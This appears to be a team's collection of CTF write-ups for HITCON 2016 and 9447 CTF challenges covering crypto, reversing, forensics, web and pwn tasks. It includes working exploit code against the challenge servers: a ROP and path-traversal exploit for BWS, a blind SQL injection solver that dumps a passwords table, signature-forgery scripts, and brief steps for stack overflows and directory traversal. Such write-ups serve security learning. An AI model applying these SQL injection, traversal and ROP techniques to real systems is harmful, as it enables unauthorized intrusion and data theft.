After checking the source code of the challenge, it was clear that the flag was used for two purposes: as AES key and as an IV.

AES is secure enough not to crack the key, but we can find out the IV with the following ‘trick’: (the images at https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#CBC is always a good source of material to help thinking through what happens)

I replaced the first block of example encrypted text with the second block (so the blocks were in the following order now: c2|c2|c3), I kept the third block, so the padding remained correct and I decrypted it.

Encrypted: e04f07e4dcd6cf096b47ba48b357814ee04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285
Decrypted: 7e009b446efd0ba5221b7f1a13f34ce9cc7bf2c48246e4e51f7cb53eda8495e36865206c617a7920646f67

If we write down how the encrypted blocks created, we get this (p = plaintext, c = ciphertext, ^ = xor, E = AES encrypt, || = block boundary):

original ciphertext: c1 = E(p1 ^ IV)  ||  c2 = E(p2 ^ c1)  ||  c3 = E(p3 ^ c2)
modified ciphertext: c2 = E(p2 ^ c1)  ||  c2 = E(p2 ^ c1)  ||  c3 = E(p3 ^ c2)
decrypted modified ciphertext: dec1 = p2 ^ c1 ^ IV  ||  ...

So if we want to know the IV (=FLAG) we can do this this way: IV = dec1 ^ p2 ^ c1 as we know all the ‘variables’.

Here is my C# code which do exactly this:

static void LetsDecrypt()
{
    var cSample = Conversion.HexToBytes("4a5b8d0034e5469c071b60000ca134d9e04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285");
    var pSample = Encoding.Default.GetBytes("The quick brown fox jumps over the lazy dog");
    var cFake = Conversion.HexToBytes("e04f07e4dcd6cf096b47ba48b357814ee04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285");
    var pFake = Conversion.HexToBytes("7e009b446efd0ba5221b7f1a13f34ce9cc7bf2c48246e4e51f7cb53eda8495e36865206c617a7920646f67".Replace(" ", ""));
    var block2input = CryptoUtils.Xor(cSample.Take(16).ToArray(), pSample.Skip(16).Take(16).ToArray());
    var dec1 = pFake.Take(16).ToArray(); // c1 ^ p2 ^ flag
    var flag = Encoding.Default.GetString(CryptoUtils.Xor(dec1, block2input));
}

The flag was

hitcon{R4nd0m IV plz XD}

Saved payload as pyc with this script:

import marshal, zlib, base64

open('code.pyc','wb').write('03f30d0a5a8cbc52'.decode('hex') + zlib.decompress(base64.b64decode('eJyNVktv...kLHmeCBQ==')))

Disassembled the pyc file with uncompyle:

[email protected]:~/ctf/hitcon2016$ uncompyle6 code.pyc
# Python 2.7 (decompiled from Python 2.7)
# Embedded file name: <string>
# Compiled at: 2013-12-26 21:06:50


def main--- This code section failed: ---

   1       0    LOAD_GLOBAL       'chr'
           3    LOAD_CONST        108
           6    CALL_FUNCTION_1   ''
           9    LOAD_GLOBAL       'chr'
          12    LOAD_CONST        108
          15    CALL_FUNCTION_1   ''
          18    LOAD_GLOBAL       'chr'
          21    LOAD_CONST        97
...

Simulated the string creation with this C# code:

static void HandcraftedPyc()
{
    // Call me a Python virtual machine! I can interpret Python bytecodes!!!
    var cmds = File.ReadAllLines(@"disas.txt").Select(x => Regex.Match(x, @"(.*?)\s+(.*)").Groups.OfType<Group>().Skip(1).Select(g => g.Value).ToArray()).ToArray();
    var stack = new Stack<string>();
    foreach (var cmd in cmds)
    {
        if (cmd[0] == "LOAD_GLOBAL" || cmd[0] == "LOAD_CONST")
            stack.Push(cmd[1]);
        else if (cmd[0] == "CALL_FUNCTION_1")
        {
            var arg = stack.Pop();
            var func = stack.Pop();
            if (func == "'chr'")
                stack.Push("" + (char)int.Parse(arg));
            else
                Debugger.Break();
        }
        else if (cmd[0] == "ROT_TWO")
        {
            var arg1 = stack.Pop();
            var arg2 = stack.Pop();
            stack.Push(arg1);
            stack.Push(arg2);
        }
        else if (cmd[0] == "BINARY_ADD")
        {
            var arg1 = stack.Pop();
            var arg2 = stack.Pop();
            stack.Push(arg2 + arg1);
        }
        else
            Debugger.Break();
    }
}

At the end the stack contains one variable, the ‘decrypted’ string. The first code block created the string “Call me a Python virtual machine! I can interpret Python bytecodes!!!”, while the second code block created the flag:

hitcon{Now you can compile and run Python bytecode in your brain!}

Fibbed

This challenge was solved by and the write up was written by one of my teammates, NGG.

The task was to crack Diffie-Hellman key exchange protocol in a group where elements correspond to Fibonacci numbers.

The base element was the 2-by-2 matrix [[0,1],[1,1]], and the group was what this base generates over a finite field of a given prime order.

All elements of this group have the form [[a,b],[b,a+b]], so the public keys (the group elements) were represented by (a,b) pairs, the private keys were represented with the exponent.

I simply used the https://en.wikipedia.org/wiki/Baby-step_giant-step algorithm to compute the discrete logarithm of the server’s public keys.

I needed a hash table with 900 million elements in order to do so, and had to use 128-bit arithmetics for internal computations, but these are not a problem on x64 Linux if you have 64 GB RAM.

The program below used 49 GB RAM and ran for about 20 minutes on a single core.

After finding the private key of the server, the following python script printed the flag.

text = '59719af4dbb78be07d0398711c0607916dd59bfa57b297cd220b9d2d7d217f278db6adca88c9802098ba704a18cce7dd0124f8ce492b39b64ced0843862ac2a6'
p = 981725946171163877
server_secret = 173288873*900000000+31300133
client_public = (453665378628814896,152333692332446539)
print decrypt(text, str(calcM(p, server_secret, client_public)))
#include <unordered_map>
#include <utility>
#include <iostream>

using namespace std;

typedef long long ll;
typedef __int128 lll;
typedef pair<ll,ll> pll;

const ll P = 981725946171163877LL;

void mul(pll& a, const pll& b)
{
	ll t = a.first;
	a.first = (ll)(((lll)a.first*(lll)b.first + (lll)a.second*(lll)b.second)%(lll)P);
	a.second = (ll)(((lll)t*(lll)b.second + (lll)a.second*((lll)b.second+(lll)b.first))%(lll)P);
}

namespace std {
	template <> struct hash<pll> {
		size_t operator()(const pll& x) const {
			return (x.first * 0x1f1f1f1f1f1f1f1fLL) ^ x.second;
		}
	};
};

int main(void)
{
	const pll a {0,1};
	const pll b {58449491987662952LL,704965025359609904LL};
	const int m = 900000000;
	const pll ainvm {725806600419337472LL,354774678182469598LL}; // This is a**(-m)
	unordered_map<pll, int> jmap;
	jmap.reserve(m);
	pll aj {1,0};
	int cnt = 0;
	for (int j = 0; j < m; j++) {
		if (cnt == 0) { cerr << "."; cnt = 10000000; } else cnt--;
		jmap.insert(std::make_pair(aj, j));
		mul(aj, a);
	}
	cout << "P2 " << jmap.size() << endl;
	pll ls = b;
	cnt = 0;
	for (ll i = 0; i < 1100000000LL; i++) {
		if (cnt == 0) { cerr << "."; cnt = 10000000; } else cnt--;
		auto it = jmap.find(ls);
		if (it != jmap.end()) {
			cout << endl;
			cout << "i=" << i << endl;
			cout << "m=" << m << endl;
			cout << "ls=" << ls.first << "," << ls.second << endl;
			cout << "j=" << it->second << endl;
		}
		mul(ls, ainvm);
	}
	return 0;
}

The flag was:

9447{Pisan0_mU5t_nEv3r_hAve_THougHt_0f_bruTe_f0rce5}

randBox

This challenge was solved by and the write up was written by one of my teammates, nguyen.

There are 10 rounds, some round did manually, ex: round1 is rot-N subs ; round2 is a tranposition ; round3->5 can be cracked using round1 approach; …

The flag was

9447{crYpt0_m4y_n0T_Be_S0_haRD}

dub-key

This challenge was solved by and the write up was written by one of my teammates, NGG.

This code cracks the signature scheme:

import base64
from fractions import gcd
from pwn import *
import traceback
import hashlib

def solve():
	with remote('dub-key-t8xd5pn6.9447.plumbing', 9447) as r:
		s = r.recv(12)
		print 'SHA'
		for i in xrange(10000000, 100000000):
			ss = s + str(i)
			if hashlib.sha1(ss).digest().endswith('\x00\x00\x00'):
				break
		print 'SHAOK'
		r.send(ss)
		r.recvline()
		tosign = map(ord, base64.b64decode(r.recv(172)))
		print 'TOSIGN', tosign
		for i in xrange(128):
			if tosign[i] == i+128:
				for j in xrange(128):
					if i == j:
						continue
					if tosign[j] == i+128:
						break
				else:
					break
		else:
			assert(False)
		print 'I', i
		g = None
		for j in xrange(50):
			r.recvline()
			r.recvline()
			r.recvline()
			r.sendline('1')
			r.send(base64.b64encode(''.join(map(chr, tosign[:i] + [j] + tosign[i+1:]))))
			line = r.recvline()
			print 'LINE', line
			x = int(line)
			if j == 0:
				g = x
			else:
				g = gcd(g, x)
		r.sendline('2')
		x = str(g)
		assert(len(x) <= 620)
		x = x + ' '*(620-len(x))
		r.send(x)
		print r.recvall()

while True:
	try:
		solve()
		break
	except:
		traceback.print_exc()

The flag was:

9447{Th1s_ta5k_WAs_a_B1T_0F_A_DaG}

wob-key & wob-key-hard

This challenge was solved by and the write up was written by one of my teammates, NGG.

After a few hours of trial and failure, I came up with the following solution:

import base64
from fractions import gcd
from pwn import *
import traceback
import random
import hashlib
import os

def cycleLen(data, place):
	seen = {};
	count = 0;
	while not place in seen:
		seen[place] = 1;
		count += 1;
		place = data[place];
	return count;

def realSign(data):
	res = 1;
	for i in range(256):
		res *= cycleLen(data, i);
	return res;

def solve():
	with remote('wob-key-e1g2l93c.9447.plumbing', 9447) as r:
		ats = [129+i for i in xrange(126)] + [254]
		bts = [128] + [128+i for i in xrange(126)]
		cts = [128+i for i in xrange(128)]
		dts = [[i for i in xrange(128)], [127-i for i in xrange(128)], [(i+50)%128 for i in xrange(128)]]
		for i in xrange(10):
			dts.append(map(ord, os.urandom(128)))
		s = r.recv(12)
		print 'SHA'
		for i in xrange(10000000, 100000000):
			ss = s + str(i)
			if hashlib.sha1(ss).digest().endswith('\x00\x00\x00'):
				break
		print 'SHAOK'
		r.send(ss)
		def sign(data):
			r.recvline()
			r.recvline()
			r.recvline()
			r.sendline('1')
			r.send(base64.b64encode(''.join(map(chr, data))))
			line = r.recvline().strip()
			print 'LINE', line
			return int(line)
		c1 = sign(cts)
		cts[191-128] = 255
		cts[255-128] = 191
		c2 = sign(cts)
		print 'C1', c1
		print 'C2', c2
		assert(4*c1 == c2)
		d = []
		for dtss in dts:
			d.append(sign(dtss))
		print 'D', d
		a = sign(ats + [255])
		print 'A', a
		b = sign(bts + [255])
		print 'B', b
		al = []
		bl = []
		sec = []
		for i in xrange(128):
			print i
			al.append(sign(ats + [i]))
			bl.append(sign(bts + [i]))
			assert(al[i]%a == 0)
			assert(bl[i]%b == 0)
			ad = al[i]//a - 1
			bd = bl[i]//b - 1
			assert(ad != bd)
			assert((ad+bd-(255-127))%2 == 0)
			assert((bd-ad+(255+127))%2 == 0)
			assert(((bd-ad+(255+127))//2) >= 128)
			assert(((bd-ad+(255+127))//2) < 256)
			print 'PAIR', ((ad+bd-(255-127))//2, (bd-ad+(255+127))//2)
			sec.append((int((ad+bd-(255-127))//2), int((bd-ad+(255+127))//2)))
		print 'AL', al
		print 'BL', bl
		print 'SEC', sec
		psk = [None]*128
		db = 1
		for x in xrange(1, 500):
			for i in xrange(128):
				if sec[i][0] == x:
					if x == 1:
						psk[i] = [sec[i][1]]
					else:
						psk[i] = []
						for j in xrange(128):
							if sec[j][0] == x-1 and sec[j][1] == sec[i][1]:
								psk[i].append(j)
						assert(len(psk[i]) > 0)
						db *= len(psk[i])
		for i in xrange(128):
			assert(psk[i] is not None)
		print 'DB', db
		assert(db < 100000)
		for i in xrange(1000000000):
			if i%1000 == 0:
				print 'N',
			secret = map(lambda p: random.choice(p), psk)
			assert(a == realSign(secret + ats + [255]))
			assert(b == realSign(secret + bts + [255]))
			for di in xrange(len(dts)):
				myd = realSign(secret + dts[di])
				if d[di] != myd:
					break
			else:
				break
		for i in xrange(128):
			assert(al[i] == realSign(secret + ats + [i]))
			assert(bl[i] == realSign(secret + bts + [i]))
		print 'L1', r.recvline().strip()
		print 'L2', r.recvline().strip()
		print 'L3', r.recvline().strip()
		r.sendline('2')
		for i in xrange(17):
			print 'L4', r.recvline().strip()
			line = r.recvline().strip()
			print 'CHECK', line
			ts = map(ord, base64.b64decode(line))
			assert(len(ts) == 128)
			s = realSign(secret + ts)
			print 'SIGN', s
			x = str(s)
			assert(len(x) <= 620)
			x = x + ' '*(620-len(x))
			print 'X', x
			r.send(x)
		print r.recvall()

while True:
	try:
		solve()
		break
	except:
		traceback.print_exc()

The flags were:

9447{S1gning_15_HaRD_0Bvi0Usly}
9447{Alth0ugh_be1Ng_sm4rt_iS_eVen_b3tter}

calcpop

This challenge was solved by and the write up was written by one of my teammates, nguyen.

It was a simple buffer overflow vulnerability.

The flag was

9447{shELl_i5_easIEr_thaN_ca1c}

calpop reloaded

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

  • set environment for calc_reloaded with RedOS package
  • got EIP control and arbitrary code execution in calc_reloaded
  • make shellcode for this OS
  • use getdirent syscall to find that out name of flag file Mes5 wi+h the b3st, d1e l1k3 the rest

The flag was

9447{th1s_O5_is_a_gl0rifi3d_c4lculat0r}

cards

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

  • get .text address in stack after play game
  • send payload to leak one of these address
  • send payload to corrupt return address in stack
  • make it to return to printFlag

The flag was

9447{ThE_Only_w1nn1Ng_M0ve_1S_t0_stEAl_The_flAg}

BWS

This challenge was solved by and the write up was written by one of my teammates, nguyen.

The vulnerability was in the URL parsing function. If you passed /../ as an URL it could read before the output buffer until the next “/” character.

The exploit code was:

from pwn import *
context.arch = 'amd64'

#pwn
r = remote('bws-ad8sfsklw.9447.plumbing', 80)
#r = remote('localhost', 33000)

raw_input('attach')

# stage 1 : prepare 0x2f
payload = ''
payload += 'GET '
payload += '/'*200
payload += ' HTTP/1.1\r\n\r\n'
r.send( payload )
print r.recv(8192)

# stage 2 : start ROP 
payload = ''
payload += 'GET /../'
payload += 'A'*8
payload += 'B'*8
payload += 'C'*8
payload += 'D'*8
payload += 'E'*8
payload += 'F'*8
payload += 'G'*8
payload += 'H'*8
payload += 'I'*8
payload += '1234\x39\x0f\x408'	# magic lifting!!
payload += 'kkk'
payload += pack(0x00000d6666666666)
payload += pack(0)
payload += '1'*8
payload += '22222'

'''
pattern 5fc3 found at 0x401323
POP RDI; RET; 
pattern 5e415fc3 found at 0x401321
POP RSI; POP R15; RET; 
'''

RDIRET = 0x401323
RSIR15RET = 0x401321
FILEBUF = 0x612010
READ = 0x400ae0 # buf, size
PRINT = 0x40115e # -

# READ(&filebuf, 0x30) -> PRINT FILE.
#payload += pack(RDIRET)
#payload += pack(FILEBUF)	# rdi
#payload += pack(RSIR15RET)
#payload += pack(0x30)	# rsi
#payload += pack(READ)
#payload += pack(RDIRET)
#payload += pack(FILEBUF)
payload += pack(PRINT)
payload += '/../flag.txt\x00'
payload += ' HTTP/1.1\r\n\r\n'
r.send( payload )

# get flag.
print r.recv(8192)
print r.recv(8192)
print r.recv(8192)
#r.interactive()

Running it on the real server gave us the flag:

Accept-Ranges: bytes
Connection: close
9447{1_h0pe_you_L1ked_our_w3b_p4ge}
*** stack smashing detected ***: /ho

Get help

The flag was in the topic of the official 9447 CTF IRC channel #9447ctf on freenode:

9447{Ask_for_help_here}

4w1h

We had to find a few locations by their Google Street View images. After finding the exact locations, we had to collect the directions where the little man looked.

These are the URL of the Google Street View images and directions which gave us the flag (the text of the URLs are places which they depict or which could be identified the easiest):

The flag was:

9447{NWSNSEWNENWWNS}

Recon 1

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

In the meantime, have a flag: 9447{YouAreStalKey}

Recon 2

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Steps to solve the challenge:

The flag was:

9447{william.clutterbuck}

flag finder

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Simple: run it!

The flag was:

9447{C0ngr47ulaT1ons_p4l_buddy_y0Uv3_solved_the_H4LT1N6_prObL3M_n1c3_}

The real flag finder

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Lot of math stuff, it will give the flag - lol NOT :)

Steps to solve the challenge:

  • just start gdb
  • run the program
  • put a breakpoint where it writes that you lost
  • read the flag from the memory (it stores it and compares it with your input)

The flag was:

9447{C0ngr47ulaT1ons_p4l_buddy_y0Uv3_solved_the_re4l__H4LT1N6_prObL3M}

danklang

This challenge was solved by and the write up was written by one of my teammates, VEK.

The code first had to be converted to some real language like python.

After this, it was still slow and ate a lot of memory, so it had to be optimized.

I wrote a C++ version that replaced the recursions with dynamic programming:

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
#include <gmpxx.h>
 
#define N 13380000
 
using namespace std;
 
bool prime (unsigned num, unsigned whatever)
{
  for (unsigned i=2; i*i<=num; ++i)
    {
      if (num%i == 0)
        return false;
    }
  return true;
}
 
mpz_class bill (int memes);
mpz_class such (int memes);
 
mpz_class ef[N];
 
mpz_class epicfail (int memes)
{
  if (memes < 0)
    return 0;
  return ef[memes];
}
 
void epicfail_fill (unsigned memes)
{
  if (ef[memes] != -1)
    return;
  mpz_class wow = 0;
  bool dank = true;
  if (memes > 1)
    {
      dank = prime (memes, 2);
      if (dank)
        wow = bill (memes - 1) + 1;
      else
        wow = such (memes - 1);
    }
  ef[memes] = wow;
}
 
mpz_class dd[N][6];
 
mpz_class dootdoot (int memes, unsigned seals)
{
  if (memes < 0)
    return 0;
  return dd[memes][seals];
}
 
void dootdoot_fill (unsigned memes, unsigned seals)
{
  if (dd[memes][seals] != -1)
    return;
  mpz_class doritos = 0;
  if (seals <= memes)
    {
      if (seals == 0)
        doritos = 1;
      else
        {
          if (seals == memes)
            doritos = 1;
          else
            {
              doritos = dootdoot (memes-1, seals-1);
              doritos = dootdoot (memes - 1, seals) + doritos;
            }
        }
    }
  dd[memes][seals] = doritos;
}
 
 
mpz_class bm[N];
 
mpz_class brotherman (int memes)
{
  if (memes < 0)
    return 0;
  return bm[memes];
}
 
void brotherman_fill (unsigned memes)
{
  if (bm[memes] != -1)
    return;
 
  mpz_class hues = 0;
  if (memes != 0)
    {
      if (memes < 3)
        hues = 1;
      else
        {
          hues = brotherman(memes - 1);
          hues = brotherman(memes - 2) + hues;
        }
    }
  hues = hues % mpz_class (987654321);
  bm[memes] = hues;
}
 
mpz_class s[N];
 
mpz_class such (int memes)
{
  if (memes < 0)
    return 0;
  return s[memes];
}
 
void such_fill (unsigned memes)
{
  if (s[memes] != -1)
    return;
 
  mpz_class wow = dootdoot (memes, 5);
  mpz_class wew;
  if (wow % 7 == 0)
    {
      wew = bill (memes - 1);
      wow = wow + 1;
    }
  else
    wew = epicfail (memes - 1);
 
  wow = wew + wow;
  s[memes] = wow;
}
 
mpz_class bi[N];
 
mpz_class bill (int memes)
{
  if (memes < 0)
    return 0;
  return bi[memes];
}
 
void bill_fill (unsigned memes)
{
  if (bi[memes] != -1)
    return;
 
  mpz_class wow = brotherman (memes);
  mpz_class wew;
  if (wow % 3 == 0)
    {
      wew = such (memes - 1);
      wow = wow + 1;
    }
  else
    wew = epicfail (memes - 1);
 
  wow = wew + wow;
  bi[memes] = wow;
}
 
int main (int argc, char **argv)
{
  for (unsigned i = 0; i < N; ++i)
    {
      ef[i] = -1;
      for (unsigned j = 0; j < 6; ++j)
        dd[i][j] = -1;
      s[i] = -1;
      bm[i] = -1;
      bi[i] = -1;
    }
  for (unsigned i = 0; i < N; ++i)
    for (unsigned j = 0; j < 6; ++j)
      dootdoot_fill (i, j);
  for (unsigned i = 0; i < N; ++i)
    {
      brotherman_fill (i);
      epicfail_fill (i);
      bill_fill (i);
      such_fill (i);
    }
  cout << epicfail (13379447) << endl;
  return 0;
}

Hello, Joe

This challenge was solved by and the write up was written by one of my teammates, nguyen.

In ctf, many team solved it fast, maybe not too hard, so i decompile code and get it fast:

9447{94ea5e32f2b5b37d947eea3a38932ae1}

imaged

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Flag is the CRC of the first 7 chunks:

9447{Steg0_redunDaNcy_CHeck}

binned

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Flag is the id of syscalls executed:

fork getpeername getpeername getsockopt setfsgid shmdt getgid getsockname sysinfo geteuid umask shutdown setresuid rmdir umask ftruncate getpgid umask shmdt getpeername bind bind setuid getdents syslog umask shmdt shutdown times msgsnd capget

The flag was:

9447{Ch3ck_0uT_My_C411iNg_C0dE}

gife up now

This was an animgif with a lot of QR codes.

The QR codes contained words multiple times.

The occurence count of the words gave us the following sequence:

1,4,3,4,4,4,1,4,3,4,3,4,4,4,1,4,3,4,4,4,1,4,5,4,4,4

The QR code text contained the hint for the challenge:

two parts, all lower, add 9447{ to start and } to the end, first looks like “7do”, cut off 450ms, second like https://www.youtube.com/watch?v=5xxTkB5bGy4 like faucet script

The delay between some frames was 400ms, and 500ms for others. Interpreting this as morse code (500ms = -, 400ms = .) gives us this sequence:

-..-----...-..--------...-..-----...-..-----...-..--------...-..--------...-..--------...

Although we did not know where were the pauses, we could use the fact from the hint that the alphabet only contained “7do” characters.

7 = −−•••
d = −••
o = −−−

This gave us the following form:

-.. --- --... -.. --- --- --... -.. --- --... -.. --- --... -.. --- --- --... -.. --- --- --... -.. --- --- --...

Which was translated to ASCII from morse:

DO7DOO7DO7DO7DOO7DOO7DOO7

The second part of the hint suggested that we should use Tap code:

. ....  ... ....  .... ....  . ....  ... ....  ... ....  .... ....  . ....  ... ....  .... ....  . ....  ..... ....  .... ....

Which translates to:

dotdootdotdyt

The final flag was:

9447{do7doo7do7do7doo7doo7doo7dotdootdotdyt}

sanutf8y_check

The challenge description gave us the following website: http://sanutf8y-check-n2wisexx.9447.plumbing which contained the flag with unicode characters. Writing them down with normal ASCII characters gave us the flag the scoreboard accepted.

YWS

Sending GET /.. HTTP/1.1 with nc listed the file names from the parent directory (outside files), and one of the directory names was the flag.

premonition

The vulnerability was an SQL injection in the operator string.

Error text leaked, from which I saw spaces were removed (also I had to send a valid user-agent).

I solved the problem with a boolean-based technique (it could be solved much easier though). First I get the table names and found the s3ekr17_passwords table.

Then requested the contents of it. It was an (userid, password) tuple, where the password was only one character from the flag and the userid was the position of the character in the string.

A part of my solver code:

var http = new HttpClient { BeforeRequest = req => req.UserAgent = "Mozilla/5.0" };

Func<string, bool> sqli = query =>
{
    var resp = http.Req("http://premonition-p8l05mpz.9447.plumbing:9447/score", "score=0&ineq=<(?)or(" + query + ")--").AsString;
    if (resp == "[]\n")
        return false;
    else if (resp.StartsWith("[[\"Xavier\", "))
        return true;
    else
        throw new Exception("SQL error: " + resp);
};

//var tableNames = BinarySearchUtils.BinarySearchText((idx, num) => sqli("SELECT(unicode(substr(name," + (idx + 1) + ",1))<" + num + ")FROM(sqlite_master)LIMIT(1)"));
//var rowCount = BinarySearchUtils.BinarySearchNum(i => sqli("SELECT(count(*)<" + i + ")FROM(s3ekr17_passwords)"), 0, 50);

for (int userId = 0; userId < 45; userId++)
{
    var leak = BinarySearchUtils.BinarySearchText((idx, num) => sqli("SELECT(unicode(substr(userid||'|'||password," + (idx + 1) + ",1))<" + num + ")FROM(s3ekr17_passwords)LIMIT(" + userId + "),(1)"));
    Console.WriteLine("User #" + userId + ": " + leak);
    File.AppendAllText("leak.txt", leak + "\r\n");
}

nicklesndimes

The website used the same framework as the CTF, where I could reset the admin’s password, and whitelist my IP address with the code found in the main javascript file of the site (although I had to log in with an other user to make this work).

This challenge was solved by and the write up was written by one of my teammates, nguyen.

Execute

xxd unreadable-4b2868cc26a8dad5695e537a9dd8a164

The flag is visible from line 300:

0000000: 3111 baea feb4 f39e e5c5 922f 73af c789  1........../s...
0000010: 2c82 a7d1 88cc 004c 6650 2c4f 57bf a91a  ,......LfP,OW...
0000020: 25dd c58c fb21 f535 d7dc 23e1 32b0 2c5b  %....!.5..#.2.,[
0000030: 0bc2 e679 1e4b c33f f7d5 986a 42b1 afec  ...y.K.?...jB...
0000040: 2b80 72dc 9108 de5b a8e7 8c27 37f4 0ebd  +.r....[...'7...
0000050: 681a 7ffb 5f00 e23f 52a5 31fc 3c11 8f74  h..._..?R.1.<..t
0000060: 3df0 b2a7 7654 18fb cd98 4b13 2b50 57fd  =...vT....K.+PW.
0000070: 84f4 693b e515 e829 65ce 25f6 ea42 c9e1  ..i;...)e.%..B..
0000080: bd63 65ab 6bf0 f73d 7294 3094 e939 a207  .ce.k..=r.0..9..
0000090: 0d92 247f a8e1 8e1f a34a d6e3 5661 3af3  ..$......J..Va:.
00000a0: 7862 d8dd 0c48 d1fc b380 8843 50a2 ab71  xb...H.....CP..q
00000b0: c6db 821d 9929 f2ee 1a27 a0e4 29a9 3f1a  .....)...'..).?.
00000c0: 815e b0d2 acda 25ec 74ef b1bf aa02 221a  .^....%.t.....".
00000d0: 99f6 e8fb 4ba0 4e0b e5d6 d6ac 8128 cf68  ....K.N......(.h
00000e0: 08ff 9648 27bb 377d a637 f41f 9e9c cc32  ...H'.7}.7.....2
00000f0: 68a6 9cc6 5743 f09d 775f 0d75 c800 4bf9  h...WC..w_.u..K.
0000100: b3f6 ca27 d36f 24d3 9d4b 2c89 adf1 d973  ...'.o$..K,....s
0000110: 37d8 601f 3420 67d7 1ab2 5a69 74a1 d34a  7.`.4 g...Zit..J
0000120: 73b0 b41d 618c 6d2c c8bc b601 8c4f ca60  s...a.m,.....O.`
0000130: eda0 4622 8e49 c23f 3998 d258 ca62 128a  ..F".I.?9..X.b..
0000140: 6f1e f023 082d 2f3a adcc ae5e 8279 4738  o..#.-/:...^.yG8
0000150: b823 93fb 99c5 c900 1a81 4026 e882 6d7f  .#[email protected]&..m.
0000160: cf2e eb8c 5fab 2e36 cc9e e27d 1978 2ff2  ...._..6...}.x/.
0000170: 8a0c 5383 c0e9 056f 0465 878d 9d00 3778  ..S....o.e....7x
0000180: 93bd f12c efea 0aff b576 75a3 bd27 92a3  ...,.....vu..'..
0000190: d362 faff 2ae2 c5b2 a695 0a16 bf98 97e0  .b..*...........
00001a0: 0e05 4498 46b5 425e 17d6 290f fe7b 7716  ..D.F.B^..)..{w.
00001b0: aeae a49f 8ce3 5fdf de3d cb15 85cf 0e70  ......_..=.....p
00001c0: b978 65cb 5e29 4bd5 1af5 3ff2 2601 66a2  .xe.^)K...?.&.f.
00001d0: 191d e64d b1fe 70a3 a796 028e f6eb 2917  ...M..p.......).
00001e0: 6560 f659 1850 f834 a0ee afe9 7fd0 4928  e`.Y.P.4......I(
00001f0: a302 c1e0 5003 3f5c 903a 2106 df95 6b6a  ....P.?\.:!...kj
0000200: 121f 0a18 5969 0853 ef62 8399 bcb8 f4e3  ....Yi.S.b......
0000210: a6d8 a5bc b0d3 f507 978a bbee ef5a 9ae2  .............Z..
0000220: 14f2 1882 60a7 4230 469f 9e92 57d7 4a6c  ....`.B0F...W.Jl
0000230: 1f90 bbce e3a6 412c bcc2 2393 5e15 804d  ......A,..#.^..M
0000240: 6abf fd4d 17ea f5b3 7d01 353b 3dd9 4ba9  j..M....}.5;=.K.
0000250: 58a3 76f0 06a2 f68d 9391 9f65 ba11 43e3  X.v........e..C.
0000260: f159 809f 1fba fd1d 42eb 6243 15cc 9036  .Y......B.bC...6
0000270: b3f1 9e00 729e ad2f db30 5170 c673 a350  ....r../.0Qp.s.P
0000280: 0d7f 1ee8 31c6 dc0f 1672 3516 0647 e8f9  ....1....r5..G..
0000290: cb19 11ad e024 a8d1 cf67 9330 208a 196e  .....$...g.0 ..n
00002a0: eb94 9492 d123 a584 ea77 c0db 6066 b70f  .....#...w..`f..
00002b0: 22fe c65e d09e e4d5 b527 880c f78a 15ab  "..^.....'......
00002c0: 1b06 d40c 28ac 4267 69c1 9eac c937 0662  ....(.Bgi....7.b
00002d0: 1d09 b6b1 a9fb 70c0 9c28 e55e a0b1 2b32  ......p..(.^..+2
00002e0: 9b05 05fa 66eb cda5 294d be4e d88f fa17  ....f...)M.N....
00002f0: 0408 e134 9dae 8f24 4137 5f6d 9fc2 4563  ...4...$A7_m..Ec
0000300: b077 d737 f4d6 fdbe 6c23 4d6a 53dd 6b8f  .w.7....l#MjS.k.
0000310: 2b4c e6ca 3e03 6570 5cb6 fe76 564c ca05  +L..>.ep\..vVL..
0000320: 295e c2b9 4fd0 0f89 3153 9c99 eb97 2ced  )^..O...1S....,.
0000330: 8cfe f6ad 024b 7c3d 1f37 0d66 f91a 0ec4  .....K|=.7.f....
0000340: 7b70 20c3 cbbd 6d5f 4cb5 2326 6da6 d3f5  {p ...m_L.#&m...
0000350: 20ef 2b55 0ea1 a5f8 52f4 13ee 4646 0c71   .+U....R...FF.q
0000360: 7d77 6fc0 aacf bfe2 9b19 b2a5 44e2 b163  }wo.........D..c
0000370: 5597 32b2 420e 2a2b b330 ba7e bf1b 1ab4  U.2.B.*+.0.~....
0000380: 4096 b46b 2a43 7d70 3108 3651 298b 0e46  @..k*C}p1.6Q)..F
0000390: f05f 9720 aa06 d78c 4c03 9784 2611 b7f7  ._. ....L...&...
00003a0: a928 da4d bbc8 932a e295 0d71 0ed6 0b43  .(.M...*...q...C
00003b0: 0197 03ad 6811 9cec 0ae0 5cae b66c 8684  ....h.....\..l..
00003c0: 8a84 fce7 2327 a4d9 cabb d90d 2d53 a922  ....#'......-S."
00003d0: a27e c1cc ca7f d539 d959 3adc 8883 05eb  .~.....9.Y:.....
00003e0: 9208 d2ed d78e a0b3 6664 ff14 e45d 8222  ........fd...]."
00003f0: 2ded 710e 7b57 e0d2 b738 8b87 aad9 3488  -.q.{W...8....4.
0000400: 93ab 7703 f88e 5611 6b27 d5ce 6d6b 44d3  ..w...V.k'..mkD.
0000410: 2a86 08d9 5d94 a8e9 1d12 9ef6 74b7 d6af  *...].......t...
0000420: 251a 5a76 49be 8c01 3e7f 9b1c 12c2 0825  %.ZvI...>......%
0000430: cc72 392a 27b5 34c0 44fe 9593 322e 4997  .r9*'.4.D...2.I.
0000440: 8095 ac4d 0cb7 4fd0 bf2a 8521 e091 ec3b  ...M..O..*.!...;
0000450: bd1f e6aa 2d41 5c5c 5223 4064 982e 4d53  ....-A\\R#@d..MS
0000460: 22f3 2f78 886c 5326 6a6b 810a 613c cbcb  "./x.lS&jk..a<..
0000470: 83eb f6f9 76d5 000d b072 8425 1c64 4e45  ....v....r.%.dNE
